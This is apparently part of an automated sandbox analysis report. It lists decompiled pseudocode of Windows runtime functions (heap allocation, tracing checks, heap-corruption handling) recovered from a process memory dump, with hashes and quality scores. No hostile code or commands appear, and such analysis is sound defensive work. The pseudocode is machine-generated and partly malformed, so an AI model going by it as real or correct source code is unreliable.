                                                    				} else {
                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                    				}
                                                    				_push( &_v64);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t18 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E04C18ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				short _v62;
                                                    				char _v68;
                                                    				signed char* _t29;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t41;
                                                    				intOrPtr _t42;
                                                    				signed int _t43;
                                                    
                                                    				_t40 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t43;
                                                    				_v28 = __ecx;
                                                    				_v62 = 0x1c2a;
                                                    				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                    				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                    				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                    				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                    				_v24 = __edx;
                                                    				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                    				if(E04B67D50() == 0) {
                                                    					_t29 = 0x7ffe0386;
                                                    				} else {
                                                    					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v68);
                                                    				_push(0x1c);
                                                    				_push(0x20402);
                                                    				_push( *_t29 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                    			}



















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E04C18A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				signed int _v12;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				intOrPtr _v40;
                                                    				short _v66;
                                                    				char _v72;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed char* _t18;
                                                    				signed int _t32;
                                                    
                                                    				_t29 = __edx;
                                                    				_v12 =  *0x4c3d360 ^ _t32;
                                                    				_t31 = _a8;
                                                    				_t30 = _a12;
                                                    				_v66 = 0x1c20;
                                                    				_v40 = __ecx;
                                                    				_v36 = __edx;
                                                    				_v32 = _a4;
                                                    				_v28 = _a8;
                                                    				_v24 = _a12;
                                                    				if(E04B67D50() == 0) {
                                                    					_t18 = 0x7ffe0386;
                                                    				} else {
                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v72);
                                                    				_push(0x14);
                                                    				_push(0x20402);
                                                    				_push( *_t18 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B4DB60(signed int __ecx) {
                                                    				intOrPtr* _t9;
                                                    				void* _t12;
                                                    				void* _t13;
                                                    				intOrPtr _t14;
                                                    
                                                    				_t9 = __ecx;
                                                    				_t14 = 0;
                                                    				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                    					_t13 = 0xc000000d;
                                                    				} else {
                                                    					_t14 = E04B4DB40();
                                                    					if(_t14 == 0) {
                                                    						_t13 = 0xc0000017;
                                                    					} else {
                                                    						_t13 = E04B4E7B0(__ecx, _t12, _t14, 0xfff);
                                                    						if(_t13 < 0) {
                                                    							L04B4E8B0(__ecx, _t14, 0xfff);
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                    							_t14 = 0;
                                                    						} else {
                                                    							_t13 = 0;
                                                    							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                    						}
                                                    					}
                                                    				}
                                                    				 *_t9 = _t14;
                                                    				return _t13;
                                                    			}








                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B4B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                    				signed char* _t13;
                                                    				intOrPtr _t22;
                                                    				char _t23;
                                                    
                                                    				_t23 = __edx;
                                                    				_t22 = __ecx;
                                                    				if(E04B67D50() != 0) {
                                                    					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                    				} else {
                                                    					_t13 = 0x7ffe0384;
                                                    				}
                                                    				if( *_t13 != 0) {
                                                    					_t13 =  *[fs:0x30];
                                                    					if((_t13[0x240] & 0x00000004) == 0) {
                                                    						goto L3;
                                                    					}
                                                    					if(E04B67D50() == 0) {
                                                    						_t13 = 0x7ffe0385;
                                                    					} else {
                                                    						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                    					}
                                                    					if(( *_t13 & 0x00000020) == 0) {
                                                    						goto L3;
                                                    					}
                                                    					return E04BC7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                    				} else {
                                                    					L3:
                                                    					return _t13;
                                                    				}
                                                    			}







                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction ID: e8630220519a52e77f10afa80dbb4007a68d8bc93bb5ffa84e8e12ad95f4939f
                                                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                    • Instruction Fuzzy Hash: 8001F9323085809BE7229B5DC844F597B98EF81758F0804E1FA158B6B1EA78F811E715
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E04BDFE87(intOrPtr __ecx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				signed int _v24;
                                                    				intOrPtr _v28;
                                                    				short _v54;
                                                    				char _v60;
                                                    				signed char* _t21;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t32;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				signed int _t35;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t35;
                                                    				_v16 = __ecx;
                                                    				_v54 = 0x1722;
                                                    				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                    				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                    				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                    				if(E04B67D50() == 0) {
                                                    					_t21 = 0x7ffe0382;
                                                    				} else {
                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                    				}
                                                    				_push( &_v60);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t21 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                    			}

















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 712316dd1a54df831e2e6112899b8bd077f979c1e3ebcf9fc8a0a657d3f20f48
                                                    • Instruction ID: 465312cca410370de5c2dca0ef641d0301701e78616e029d38e0a60317c74543
                                                    • Opcode Fuzzy Hash: 712316dd1a54df831e2e6112899b8bd077f979c1e3ebcf9fc8a0a657d3f20f48
                                                    • Instruction Fuzzy Hash: 82011270A04208AFDB14DFA8D545A6EB7F4EF04304F144599B519DB392EA35E901CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 48%
                                                    			E04C18F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				short _v50;
                                                    				char _v56;
                                                    				signed char* _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t31;
                                                    				signed int _t32;
                                                    
                                                    				_t29 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t32;
                                                    				_v16 = __ecx;
                                                    				_v50 = 0x1c2c;
                                                    				_v24 = _a4;
                                                    				_v20 = _a8;
                                                    				_v12 = __edx;
                                                    				if(E04B67D50() == 0) {
                                                    					_t18 = 0x7ffe0386;
                                                    				} else {
                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v56);
                                                    				_push(0x10);
                                                    				_push(0x402);
                                                    				_push( *_t18 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 488dc88581fe9982ab8ea3d68743fe703acf8d94602d6bebf645615fa6cb0e57
                                                    • Instruction ID: e68d93bd3432d2ddbf3a420ba1540ab8d99ffe56e7aa19397c1cb756ea759faf
                                                    • Opcode Fuzzy Hash: 488dc88581fe9982ab8ea3d68743fe703acf8d94602d6bebf645615fa6cb0e57
                                                    • Instruction Fuzzy Hash: CC014474A0420CAFDB04EFB8D545AAEB7F4EF08704F104499F905EB390EA34EA00DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 48%
                                                    			E04C0131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				short _v50;
                                                    				char _v56;
                                                    				signed char* _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t30;
                                                    				intOrPtr _t31;
                                                    				signed int _t32;
                                                    
                                                    				_t29 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t32;
                                                    				_v20 = _a4;
                                                    				_v12 = _a8;
                                                    				_v24 = __ecx;
                                                    				_v16 = __edx;
                                                    				_v50 = 0x1021;
                                                    				if(E04B67D50() == 0) {
                                                    					_t18 = 0x7ffe0380;
                                                    				} else {
                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    				}
                                                    				_push( &_v56);
                                                    				_push(0x10);
                                                    				_push(0x20402);
                                                    				_push( *_t18 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                    			}
















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66233f42be02a9c1846ffd2bb220cdde62004b047beb7d1a0e337c6e5a4fc793
                                                    • Instruction ID: 452229196e11ed18d0fbe682c405e21e6f52b07b8d1f9d88d44e5c9890f8e390
                                                    • Opcode Fuzzy Hash: 66233f42be02a9c1846ffd2bb220cdde62004b047beb7d1a0e337c6e5a4fc793
                                                    • Instruction Fuzzy Hash: F3013171A01208AFDB04EFA9D545AAEB7F4FF08704F048099F845EB391EA34AA00CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E04C01608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				short _v46;
                                                    				char _v52;
                                                    				signed char* _t15;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t27;
                                                    				intOrPtr _t28;
                                                    				signed int _t29;
                                                    
                                                    				_t26 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t29;
                                                    				_v12 = _a4;
                                                    				_v20 = __ecx;
                                                    				_v16 = __edx;
                                                    				_v46 = 0x1024;
                                                    				if(E04B67D50() == 0) {
                                                    					_t15 = 0x7ffe0380;
                                                    				} else {
                                                    					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                    				}
                                                    				_push( &_v52);
                                                    				_push(0xc);
                                                    				_push(0x20402);
                                                    				_push( *_t15 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                    			}















                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9870e3b26c0f69018599121b97205e4d0b9625b3d5a438db1a08ce85d6c20418
                                                    • Instruction ID: 54ebeeb1f9006c28ab4f83e5af7d7f44c6ca785229e4540644974338bfcb9ac3
                                                    • Opcode Fuzzy Hash: 9870e3b26c0f69018599121b97205e4d0b9625b3d5a438db1a08ce85d6c20418
                                                    • Instruction Fuzzy Hash: 2CF06271E04248EFDB04EFA9D845AAEB7F4EF04304F044099F905EB391EA34A900CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B6C577(void* __ecx, char _a4) {
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t17;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    
                                                    				_t18 = __ecx;
                                                    				_t21 = __ecx;
                                                    				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04B6C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                    					__eflags = _a4;
                                                    					if(__eflags != 0) {
                                                    						L10:
                                                    						E04C188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                    						L9:
                                                    						return 0;
                                                    					}
                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                    					if(__eflags == 0) {
                                                    						goto L10;
                                                    					}
                                                    					goto L9;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}










                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4189e8ce80fa7748de49f07c36838767658f95166aef6fe1ec669fbd6ac65f48
                                                    • Instruction ID: fef52c8a8743877e1aa08d117bfaaa83e83b4edf41442351c74185bc50aaf9ab
                                                    • Opcode Fuzzy Hash: 4189e8ce80fa7748de49f07c36838767658f95166aef6fe1ec669fbd6ac65f48
                                                    • Instruction Fuzzy Hash: 3DF090B29156949EE7319B18C916B227FF6DB05774F4444EBD48787112C7ACF880CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E04C02073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                    				void* __esi;
                                                    				signed char _t3;
                                                    				signed char _t7;
                                                    				void* _t19;
                                                    
                                                    				_t17 = __ecx;
                                                    				_t3 = E04BFFD22(__ecx);
                                                    				_t19 =  *0x4c3849c - _t3; // 0x0
                                                    				if(_t19 == 0) {
                                                    					__eflags = _t17 -  *0x4c38748; // 0x0
                                                    					if(__eflags <= 0) {
                                                    						E04C01C06();
                                                    						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                    						__eflags = _t3;
                                                    						if(_t3 != 0) {
                                                    							L5:
                                                    							__eflags =  *0x4c38724 & 0x00000004;
                                                    							if(( *0x4c38724 & 0x00000004) == 0) {
                                                    								asm("int3");
                                                    								return _t3;
                                                    							}
                                                    						} else {
                                                    							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                    							__eflags = _t3 - 3;
                                                    							if(_t3 == 3) {
                                                    								goto L5;
                                                    							}
                                                    						}
                                                    					}
                                                    					return _t3;
                                                    				} else {
                                                    					_t7 =  *0x4c38724; // 0x0
                                                    					return E04BF8DF1(__ebx, 0xc0000374, 0x4c35890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                    				}
                                                    			}








                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 43%
                                                    			E04C18D34(intOrPtr __ecx, intOrPtr __edx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				short _v42;
                                                    				char _v48;
                                                    				signed char* _t12;
                                                    				intOrPtr _t18;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t25;
                                                    				signed int _t26;
                                                    
                                                    				_t23 = __edx;
                                                    				_v8 =  *0x4c3d360 ^ _t26;
                                                    				_v16 = __ecx;
                                                    				_v42 = 0x1c2b;
                                                    				_v12 = __edx;
                                                    				if(E04B67D50() == 0) {
                                                    					_t12 = 0x7ffe0386;
                                                    				} else {
                                                    					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v48);
                                                    				_push(8);
                                                    				_push(0x20402);
                                                    				_push( *_t12 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 54%
                                                    			E04B8927A(void* __ecx) {
                                                    				signed int _t11;
                                                    				void* _t14;
                                                    
                                                    				_t11 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                    				if(_t11 != 0) {
                                                    					E04B8FA60(_t11, 0, 0x98);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                    					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                    					E04B892C6(_t11, _t14);
                                                    				}
                                                    				return _t11;
                                                    			}






                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 36%
                                                    			E04C18CD6(intOrPtr __ecx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v12;
                                                    				short _v38;
                                                    				char _v44;
                                                    				signed char* _t11;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t24;
                                                    				signed int _t25;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t25;
                                                    				_v12 = __ecx;
                                                    				_v38 = 0x1c2d;
                                                    				if(E04B67D50() == 0) {
                                                    					_t11 = 0x7ffe0386;
                                                    				} else {
                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v44);
                                                    				_push(0xffffffe4);
                                                    				_push(0x402);
                                                    				_push( *_t11 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E04B6746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                    				signed int _t8;
                                                    				void* _t10;
                                                    				short* _t17;
                                                    				void* _t19;
                                                    				intOrPtr _t20;
                                                    				void* _t21;
                                                    
                                                    				_t20 = __esi;
                                                    				_t19 = __edi;
                                                    				_t17 = __ebx;
                                                    				if( *((char*)(_t21 - 0x25)) != 0) {
                                                    					if(__ecx == 0) {
                                                    						E04B5EB70(__ecx, 0x4c379a0);
                                                    					} else {
                                                    						asm("lock xadd [ecx], eax");
                                                    						if((_t8 | 0xffffffff) == 0) {
                                                    							_push( *((intOrPtr*)(__ecx + 4)));
                                                    							E04B895D0();
                                                    							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                    							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                    							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                    						}
                                                    					}
                                                    					L10:
                                                    				}
                                                    				_t10 = _t19 + _t19;
                                                    				if(_t20 >= _t10) {
                                                    					if(_t19 != 0) {
                                                    						 *_t17 = 0;
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				return _t10;
                                                    				goto L10;
                                                    			}










                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 36%
                                                    			E04C18B58(intOrPtr __ecx) {
                                                    				signed int _v8;
                                                    				intOrPtr _v20;
                                                    				short _v46;
                                                    				char _v52;
                                                    				signed char* _t11;
                                                    				intOrPtr _t17;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t23;
                                                    				intOrPtr _t24;
                                                    				signed int _t25;
                                                    
                                                    				_v8 =  *0x4c3d360 ^ _t25;
                                                    				_v20 = __ecx;
                                                    				_v46 = 0x1c26;
                                                    				if(E04B67D50() == 0) {
                                                    					_t11 = 0x7ffe0386;
                                                    				} else {
                                                    					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                    				}
                                                    				_push( &_v52);
                                                    				_push(4);
                                                    				_push(0x402);
                                                    				_push( *_t11 & 0x000000ff);
                                                    				return E04B8B640(E04B89AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                    			}














                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B44F2E(void* __ecx, char _a4) {
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t17;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    
                                                    				_t18 = __ecx;
                                                    				_t21 = __ecx;
                                                    				if(__ecx == 0) {
                                                    					L6:
                                                    					__eflags = _a4;
                                                    					if(__eflags != 0) {
                                                    						L8:
                                                    						E04C188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                    						L9:
                                                    						return 0;
                                                    					}
                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                    					if(__eflags != 0) {
                                                    						goto L9;
                                                    					}
                                                    					goto L8;
                                                    				}
                                                    				_t18 = __ecx + 0x30;
                                                    				if(E04B6C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b21030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                    					goto L6;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}










                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E04B7A44B(signed int __ecx) {
                                                    				intOrPtr _t13;
                                                    				signed int _t15;
                                                    				signed int* _t16;
                                                    				signed int* _t17;
                                                    
                                                    				_t13 =  *0x4c37b9c; // 0x0
                                                    				_t15 = __ecx;
                                                    				_t16 = L04B64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                    				if(_t16 == 0) {
                                                    					return 0;
                                                    				}
                                                    				 *_t16 = _t15;
                                                    				_t17 =  &(_t16[2]);
                                                    				E04B8FA60(_t17, 0, _t15 << 2);
                                                    				return _t17;
                                                    			}








                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88dd3388776ac224568dc53a56403875eb94edc148fe5fa12bd6ff546a93ba3c
                                                    • Instruction ID: 4d544947263fa87e6a5bbe94f515f59ba8f4be25d31c5e00e7a6fce5c2340e66
